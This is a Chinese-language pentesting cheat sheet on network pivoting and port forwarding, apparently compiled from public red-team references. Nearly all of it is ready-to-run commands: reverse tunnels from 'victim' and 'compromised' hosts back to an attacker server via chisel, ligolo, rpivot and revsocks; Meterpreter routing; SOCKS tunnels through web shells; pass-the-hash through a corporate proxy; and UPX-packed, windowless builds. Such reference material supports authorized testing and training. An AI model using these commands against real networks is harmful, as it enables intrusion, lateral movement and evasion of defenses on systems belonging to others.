内网穿透姿势总结

本文总结内网穿透、端口转发思路及方法...

---

0x00 基本技巧

1. 类型

类型	应用场景
Listen - Listen	对外暴露，不一定连接
Listen - Connect	常规转发
Connect - Connect	无法绑定，连接桥接两台主机

2. Listen - Listen

类型	用法
ncat	ncat -v -l -p 8080 -c “ncat -v -l -p 9090”
socat	socat -v tcp-listen:8080 tcp-listen:9090
remote host 1	ncat localhost 8080 < file
remote host 2	ncat localhost 9090 > newfile

3. Listen - Connect

类型	用法
ncat	ncat -l -v -p 8080 -c “ncat localhost 9090”
socat	socat -v tcp-listen:8080,reuseaddr tcp-connect:localhost:9090
remote host 1	ncat localhost -p 8080 < file
remote host 2	ncat -l -p 9090 > newfile

4. Connect - Connect

类型	用法
ncat	ncat localhost 8080 -c “ncat localhost 9090”
socat	socat -v tcp-connect:localhost:8080,reuseaddr tcp-connect:localhost:9090
remote host 1	ncat -l -p 8080 < file
remote host 2	ncat -l -p 9090 > newfile

0x01 SSH端口转发

1. SOCKS Proxy

ssh -D8080 [user]@[host]

ssh -N -f -D 9000 [user]@[host]

-f : ssh in background
-N : do not execute a remote command

2. Local Port Forwarding

ssh -L [bindaddr]:[port]:[dsthost]:[dstport] [user]@[host]

3. Remote Port Forwarding

ssh -R [bindaddr]:[port]:[localhost]:[localport] [user]@[host]
ssh -R 3389:10.1.1.224:3389 [email protected]

0x02 Metasploit穿透

# Meterpreter list active port forwards
portfwd list 

# Forwards 3389 (RDP) to 3389 on the compromised machine running the Meterpreter shell
portfwd add –l 3389 –p 3389 –r target-host 
portfwd add -l 88 -p 88 -r 127.0.0.1
portfwd add -L 0.0.0.0 -l 445 -r 192.168.57.102 -p 445

# Forwards 3389 (RDP) to 3389 on the compromised machine running the Meterpreter shell
portfwd delete –l 3389 –p 3389 –r target-host 
# Meterpreter delete all port forwards
portfwd flush 

or

# Use Meterpreters autoroute script to add the route for specified subnet 192.168.15.0
run autoroute -s 192.168.15.0/24 
use auxiliary/server/socks_proxy
set SRVPORT 9090
set VERSION 4a
# or
use auxiliary/server/socks4a     # (deprecated)


# Meterpreter list all active routes
run autoroute -p 

route #Meterpreter view available networks the compromised host can access
# Meterpreter add route for 192.168.14.0/24 via Session number.
route add 192.168.14.0 255.255.255.0 3 

# Meterpreter delete route for 192.168.14.0/24 via Session number.

route delete 192.168.14.0 255.255.255.0 3 

# Meterpreter delete all routes
route flush 

0x03 Graftcp

基本用法

# Create a SOCKS5, using Chisel or another tool and forward it through SSH
(attacker) $ ssh -fNT -i /tmp/id_rsa -L 1080:127.0.0.1:1080 root@IP_VPS
(vps) $ ./chisel server --tls-key ./key.pem --tls-cert ./cert.pem -p 8443 -reverse 
(victim 1) $ ./chisel client --tls-skip-verify https://IP_VPS:8443 R:socks 

# Run graftcp and specify the SOCKS5
(attacker) $ graftcp-local -listen :2233 -logfile /tmp/toto -loglevel 6 -socks5 127.0.0.1:1080
(attacker) $ graftcp ./nuclei -u http://172.16.1.24

基础配置

# https://github.com/hmgle/graftcp/blob/master/local/example-graftcp-local.conf
## Listen address (default ":2233")
listen = :2233
loglevel = 1

## SOCKS5 address (default "127.0.0.1:1080")
socks5 = 127.0.0.1:1080
# socks5_username = SOCKS5USERNAME
# socks5_password = SOCKS5PASSWORD

## Set the mode for select a proxy (default "auto")
select_proxy_mode = auto

0x04 Web SOCKS

1. reGeorg

python reGeorgSocksProxy.py -p 8080 -u http://host/shell.jsp # the socks proxy will be on port 8080

optional arguments:
  -h, --help           show this help message and exit
  -l , --listen-on     The default listening address
  -p , --listen-port   The default listening port
  -r , --read-buff     Local read buffer, max data to be sent per POST
  -u , --url           The url containing the tunnel script
  -v , --verbose       Verbose output[INFO|DEBUG]

2. pivotnacci

pip3 install pivotnacci
pivotnacci  https://domain.com/agent.php --password "s14r1t"
pivotnacci  https://domain.com/agent.php --polling-interval 2000

0x05 Empire

(Empire) > socksproxyserver
(Empire) > use module management/invoke_socksproxy
(Empire) > set remoteHost 10.10.10.10
(Empire) > run

0x06 sshuttle

pacman -Sy sshuttle
apt-get install sshuttle
sshuttle -vvr [email protected] 10.1.1.0/24
sshuttle -vvr username@pivot_host 10.2.2.0/24 

# using a private key
$ sshuttle -vvr [email protected] 10.1.1.0/24 -e "ssh -i ~/.ssh/id_rsa" 

# -x == exclude some network to not transmit over the tunnel
# -x x.x.x.x.x/24

0x07 chisel

go get -v github.com/jpillora/chisel

# forward port 389 and 88 to hacker computer
user@hacker$ /opt/chisel/chisel server -p 8008 --reverse
user@victim$ .\chisel.exe client YOUR_IP:8008 R:88:127.0.0.1:88 R:389:localhost:389 

# SOCKS
user@victim$ .\chisel.exe client YOUR_IP:8008 R:socks

0x08 Ligolo

Build Ligolo

# Get Ligolo and dependencies
cd `go env GOPATH`/src
git clone https://github.com/sysdream/ligolo
cd ligolo
make dep

# Generate self-signed TLS certificates (will be placed in the certs folder)
make certs TLS_HOST=example.com

make build-all

Use Ligolo

# On your attack server.
./bin/localrelay_linux_amd64

# On the compromise host.
ligolo_windows_amd64.exe -relayserver LOCALRELAYSERVER:5555

0x09 Gost

git clone https://github.com/ginuerzh/gost
cd gost/cmd/gost
go build

# Socks5 Proxy
Server side: gost -L=socks5://:1080
Client side: gost -L=:8080 -F=socks5://server_ip:1080?notls=true

# Local Port Forward
gost -L=tcp://:2222/192.168.1.1:22 [-F=..]

0x0A Rpivot

Server (Attacker box)

python server.py --proxy-port 1080 --server-port 9443 --server-ip 0.0.0.0

Client (Compromised box)

python client.py --server-ip <ip> --server-port 9443

Through corporate proxy

python client.py --server-ip [server ip] --server-port 9443 --ntlm-proxy-ip [proxy ip] \
--ntlm-proxy-port 8080 --domain CORP --username jdoe --password 1q2w3e

Passing the hash

python client.py --server-ip [server ip] --server-port 9443 --ntlm-proxy-ip [proxy ip] \
--ntlm-proxy-port 8080 --domain CORP --username jdoe \
--hashes 986D46921DDE3E58E03656362614DEFE:50C189A98FF73B39AAD3B435B51404EE

0x0B revsocks

# Listen on the server and create a SOCKS 5 proxy on port 1080
user@VPS$ ./revsocks -listen :8443 -socks 127.0.0.1:1080 -pass Password1234

# Connect client to the server
user@PC$ ./revsocks -connect 10.10.10.10:8443 -pass Password1234
user@PC$ ./revsocks -connect 10.10.10.10:8443 -pass Password1234 -proxy proxy.domain.local:3128 -proxyauth Domain/userpame:userpass -useragent "Mozilla 5.0/IE Windows 10"

# Build for Linux
git clone https://github.com/kost/revsocks
export GOPATH=~/go
go get github.com/hashicorp/yamux
go get github.com/armon/go-socks5
go get github.com/kost/go-ntlmssp
go build
go build -ldflags="-s -w" && upx --brute revsocks

# Build for Windows
go get github.com/hashicorp/yamux
go get github.com/armon/go-socks5
go get github.com/kost/go-ntlmssp
GOOS=windows GOARCH=amd64 go build -ldflags="-s -w"
go build -ldflags -H=windowsgui
upx revsocks

0x0C plink

# exposes the SMB port of the machine in the port 445 of the SSH Server
plink -l root -pw toor -R 445:127.0.0.1:445 
# exposes the RDP port of the machine in the port 3390 of the SSH Server
plink -l root -pw toor ssh-server-ip -R 3390:127.0.0.1:3389  

plink -l root -pw mypassword 192.168.18.84 -R
plink.exe -v -pw mypassword [email protected] -L 6666:127.0.0.1:445

plink -R [Port to forward to on your VPS]:localhost:[Port to forward on your local machine] [VPS IP]
# redirects the Windows port 445 to Kali on port 22
plink -P 22 -l root -pw some_password -C -R 445:127.0.0.1:445 192.168.12.185

0x0D ngrok

# get the binary
wget https://bin.equinox.io/c/4VmDzA7iaHb/ngrok-stable-linux-amd64.zip
unzip ngrok-stable-linux-amd64.zip 

# log into the service
./ngrok authtoken 3U[REDACTED_TOKEN]Hm

# deploy a port forwarding for 4433
./ngrok http 4433
./ngrok tcp 4433

0x0E cloudflared

# Get the binary
wget https://bin.equinox.io/c/VdrWdbjqyF/cloudflared-stable-linux-amd64.tgz
tar xvzf cloudflared-stable-linux-amd64.tgz
# Expose accessible internal service to the internet
./cloudflared tunnel --url <protocol>://<host>:<port>

0x0F 流量捕获分析

1. Windows (netsh)

# start a capture use the netsh command.
netsh trace start capture=yes report=disabled tracefile=c:\trace.etl maxsize=16384

# stop the trace
netsh trace stop

# Event tracing can be also used across a reboots
netsh trace start capture=yes report=disabled persistent=yes tracefile=c:\trace.etl maxsize=16384

# To open the file in Wireshark you have to convert the etl file to the cap file format. Microsoft has written a convert for this task. Download the latest version.
etl2pcapng.exe c:\trace.etl c:\trace.pcapng

# Use filters
netsh trace start capture=yes report=disabled Ethernet.Type=IPv4 IPv4.Address=10.200.200.3 tracefile=c:\trace.etl maxsize=16384

2. Linux (tcpdump)

sudo apt-get install tcpdump
tcpdump -w 0001.pcap -i eth0
tcpdump -A -i eth0

# capture every TCP packet
tcpdump -i eth0 tcp

# capture everything on port 22
tcpdump -i eth0 port 22

0xFF Reference

• https://artkond.com/2017/03/23/pivoting-guide/
• https://www.offensive-security.com/metasploit-unleashed/pivoting/
• http://woshub.com/port-forwarding-in-windows/
• https://www.tcpdump.org/manpages/tcpdump.1.html
• https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Network%20Pivoting%20Techniques.md